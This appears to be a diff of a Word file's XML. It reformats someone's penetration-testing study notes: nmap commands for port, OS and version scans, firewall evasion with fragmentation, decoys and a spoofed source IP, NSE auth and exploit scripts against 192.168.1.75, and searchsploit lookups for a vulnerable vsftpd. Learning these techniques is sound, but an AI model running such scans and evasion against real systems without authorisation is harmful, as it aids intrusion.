-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>sS</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+              <w:t>Nmap -sS {IPADDRESS}</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve"> – </w:t>
+            </w:r>
+            <w:r>
+              <w:t>never full connection</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve">, </w:t>
+            </w:r>
+            <w:r>
+              <w:t>SYN</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> connection – better use</w:t>
+            </w:r>
+            <w:r>
+              <w:t>!</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4631" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>Sudo nmap -sU {IPADDRESS}</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4945" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>Nmap -s</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>T</w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -1877,60 +1688,13 @@
               </w:rPr>
               <w:t xml:space="preserve"> {IPADDRESS}</w:t>
             </w:r>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t xml:space="preserve"> – </w:t>
-            </w:r>
-            <w:r>
-              <w:t>never full connection</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve">, </w:t>
-            </w:r>
-            <w:r>
-              <w:t>SYN</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve"> connection – better use</w:t>
-            </w:r>
-            <w:r>
-              <w:t>!</w:t>
-            </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="4631" w:type="dxa"/>
           </w:tcPr>
-          <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>nmap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> -</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>sU</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> {IPADDRESS}</w:t>
-            </w:r>
-          </w:p>
+          <w:p/>
         </w:tc>
       </w:tr>
       <w:tr>
@@ -1938,38 +1702,7 @@
           <w:tcPr>
             <w:tcW w:w="4945" w:type="dxa"/>
           </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>Nmap -</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>s</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>T</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t xml:space="preserve"> {IPADDRESS}</w:t>
-            </w:r>
-          </w:p>
+          <w:p/>
         </w:tc>
         <w:tc>
           <w:tcPr>
@@ -1983,7 +1716,17 @@
           <w:tcPr>
             <w:tcW w:w="4945" w:type="dxa"/>
           </w:tcPr>
-          <w:p/>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t>man nmap</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> – manual, really helps!</w:t>
+            </w:r>
+          </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
@@ -1997,25 +1740,7 @@
           <w:tcPr>
             <w:tcW w:w="4945" w:type="dxa"/>
           </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:highlight w:val="yellow"/>
-              </w:rPr>
-              <w:t xml:space="preserve">man </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:highlight w:val="yellow"/>
-              </w:rPr>
-              <w:t>nmap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> – manual, really helps!</w:t>
-            </w:r>
-          </w:p>
+          <w:p/>
         </w:tc>
         <w:tc>
           <w:tcPr>
@@ -2029,20 +1754,40 @@
           <w:tcPr>
             <w:tcW w:w="4945" w:type="dxa"/>
           </w:tcPr>
-          <w:p/>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:u w:val="single"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:u w:val="single"/>
+              </w:rPr>
+              <w:t>Discovering Target Operating System</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:r>
+              <w:t>Sudo nmap -</w:t>
+            </w:r>
+            <w:r>
+              <w:t>O</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> {ipaddress}</w:t>
+            </w:r>
+          </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="4631" w:type="dxa"/>
           </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4945" w:type="dxa"/>
-          </w:tcPr>
           <w:p>
             <w:pPr>
               <w:rPr>
@@ -2057,216 +1802,41 @@
                 <w:bCs/>
                 <w:u w:val="single"/>
               </w:rPr>
-              <w:t>Discovering Target Operating System</w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-          <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>nmap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> -</w:t>
-            </w:r>
-            <w:r>
-              <w:t>O</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve"> {</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>ipaddress</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>}</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4631" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-                <w:u w:val="single"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-                <w:u w:val="single"/>
-              </w:rPr>
               <w:t>Detecting service version on port</w:t>
             </w:r>
           </w:p>
           <w:p/>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>nmap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> -</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>sV</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> {</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>ipaddress</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>}</w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-            </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>Sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>nmap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t xml:space="preserve"> -A {</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>ipaddress</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>}</w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-          <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>nmap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> -</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>sV</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> –version-intensity 9 {</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>ipaddress</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>}</w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-          <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>nmap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> -</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>sn</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> {</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>ipaddress</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>}</w:t>
+            <w:r>
+              <w:t>Sudo nmap -sV {ipaddress}</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>Sudo nmap -A {ipaddress}</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:r>
+              <w:t>Sudo nmap -sV –version-intensity 9 {ipaddress}</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:r>
+              <w:t>nmap -sn {ipaddress}</w:t>
             </w:r>
             <w:r>
               <w:t>-255</w:t>
@@ -2280,21 +1850,12 @@
                 <w:bCs/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>nmap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t xml:space="preserve"> -p</w:t>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>nmap -p</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2315,23 +1876,7 @@
                 <w:b/>
                 <w:bCs/>
               </w:rPr>
-              <w:t xml:space="preserve"> {</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>ipaddress</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>}</w:t>
+              <w:t xml:space="preserve"> {ipaddress}</w:t>
             </w:r>
           </w:p>
           <w:p/>
@@ -2380,29 +1925,8 @@
             <w:tcW w:w="4945" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>nmap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> -f {</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>ipaddress</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve">} </w:t>
+            <w:r>
+              <w:t xml:space="preserve">Sudo nmap -f {ipaddress} </w:t>
             </w:r>
             <w:r>
               <w:t xml:space="preserve">– </w:t>
@@ -2423,7 +1947,6 @@
                 <w:bCs/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -2436,15 +1959,7 @@
                 <w:b/>
                 <w:bCs/>
               </w:rPr>
-              <w:t>(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t xml:space="preserve">flood </w:t>
+              <w:t xml:space="preserve">(flood </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2464,57 +1979,27 @@
           <w:p>
             <w:r>
               <w:lastRenderedPageBreak/>
-              <w:t>-</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>nmap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> -D </w:t>
+              <w:t xml:space="preserve">-Sudo nmap -D </w:t>
             </w:r>
             <w:r>
               <w:t xml:space="preserve">RND:5 </w:t>
             </w:r>
             <w:r>
-              <w:t>{</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>ipaddress</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>}</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve"> -</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>sS</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-          </w:p>
-          <w:p/>
-          <w:p/>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-            </w:pPr>
-            <w:proofErr w:type="gramStart"/>
+              <w:t>{ipaddress}</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> -sS</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p/>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -2527,15 +2012,7 @@
                 <w:b/>
                 <w:bCs/>
               </w:rPr>
-              <w:t>(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t xml:space="preserve">flood – when scanning </w:t>
+              <w:t xml:space="preserve">(flood – when scanning </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2554,58 +2031,10 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t>-</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>nmap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> -D </w:t>
-            </w:r>
-            <w:r>
-              <w:t>{</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>ipaddress</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>}, D {</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>ipaddress</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>}, {</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>ipaddress</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>}, {</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>ipaddress</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>}</w:t>
+              <w:t xml:space="preserve">-Sudo nmap -D </w:t>
+            </w:r>
+            <w:r>
+              <w:t>{ipaddress}, D {ipaddress}, {ipaddress}, {ipaddress}</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2652,29 +2081,8 @@
             <w:tcW w:w="4945" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>nmap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> -S 8.8.8.8 -</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Pn</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> -e</w:t>
+            <w:r>
+              <w:t>Sudo nmap -S 8.8.8.8 -Pn -e</w:t>
             </w:r>
             <w:r>
               <w:t xml:space="preserve"> eth0</w:t>
@@ -2745,27 +2153,12 @@
           </w:p>
           <w:p/>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>nmap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> –script auth 192.168.1.75 -</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>sS</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve">Sudo </w:t>
+            </w:r>
+            <w:r>
+              <w:t>nmap –script auth 192.168.1.75 -sS</w:t>
+            </w:r>
             <w:r>
               <w:t xml:space="preserve">   </w:t>
             </w:r>
@@ -2782,35 +2175,14 @@
           </w:p>
           <w:p/>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>nmap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> –script </w:t>
+            <w:r>
+              <w:t xml:space="preserve">Sudo nmap –script </w:t>
             </w:r>
             <w:r>
               <w:t>malware</w:t>
             </w:r>
             <w:r>
-              <w:t xml:space="preserve"> 192.168.1.75 -</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>sS</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve">   </w:t>
+              <w:t xml:space="preserve"> 192.168.1.75 -sS   </w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2821,29 +2193,8 @@
             <w:tcW w:w="4945" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>nmap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> –script banner 192.168.1.75 -</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>sS</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve">   </w:t>
+            <w:r>
+              <w:t xml:space="preserve">Sudo nmap –script banner 192.168.1.75 -sS   </w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2852,29 +2203,8 @@
             <w:tcW w:w="4631" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>nmap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> –script exploit 192.168.1.75 -</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>sS</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve">   </w:t>
+            <w:r>
+              <w:t xml:space="preserve">Sudo nmap –script exploit 192.168.1.75 -sS   </w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2899,19 +2229,9 @@
             <w:tcW w:w="4945" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>nmap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>Sudo nmap</w:t>
+            </w:r>
             <w:r>
               <w:t xml:space="preserve"> –script-help {name}</w:t>
             </w:r>
@@ -2922,32 +2242,11 @@
             <w:tcW w:w="4631" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>nmap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> –script</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve"> ftp-</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>anon.nse</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> 192.168.175</w:t>
+            <w:r>
+              <w:t>Sudo nmap –script</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> ftp-anon.nse 192.168.175</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2983,16 +2282,8 @@
               <w:rPr>
                 <w:highlight w:val="yellow"/>
               </w:rPr>
-              <w:t xml:space="preserve">Manual Vulnerability Analysis and </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:highlight w:val="yellow"/>
-              </w:rPr>
-              <w:t>searchploit</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+              <w:t>Manual Vulnerability Analysis and searchploit</w:t>
+            </w:r>
           </w:p>
         </w:tc>
       </w:tr>
@@ -3014,37 +2305,8 @@
                 <w:numId w:val="5"/>
               </w:numPr>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>nmap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> -</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>sV</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> {</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>ipaddress</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>}</w:t>
+            <w:r>
+              <w:t>Sudo nmap -sV {ipaddress}</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -3056,15 +2318,7 @@
               </w:numPr>
             </w:pPr>
             <w:r>
-              <w:t>Find version (</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>vsftpd</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> 2.3.)</w:t>
+              <w:t>Find version (vsftpd 2.3.)</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -3076,15 +2330,7 @@
               </w:numPr>
             </w:pPr>
             <w:r>
-              <w:t xml:space="preserve">Google it if </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>theres</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> already existing exploitation</w:t>
+              <w:t>Google it if theres already existing exploitation</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -3096,13 +2342,8 @@
             <w:pPr>
               <w:ind w:firstLine="720"/>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Searchsploit</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> {version}</w:t>
+            <w:r>
+              <w:t>Searchsploit {version}</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -3294,21 +2535,12 @@
                 <w:bCs/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>Metaploit</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t xml:space="preserve"> Framework Structure</w:t>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>Metaploit Framework Structure</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3339,23 +2571,7 @@
                 <w:b/>
                 <w:bCs/>
               </w:rPr>
-              <w:t>Cd /</w:t>
-            </w:r>
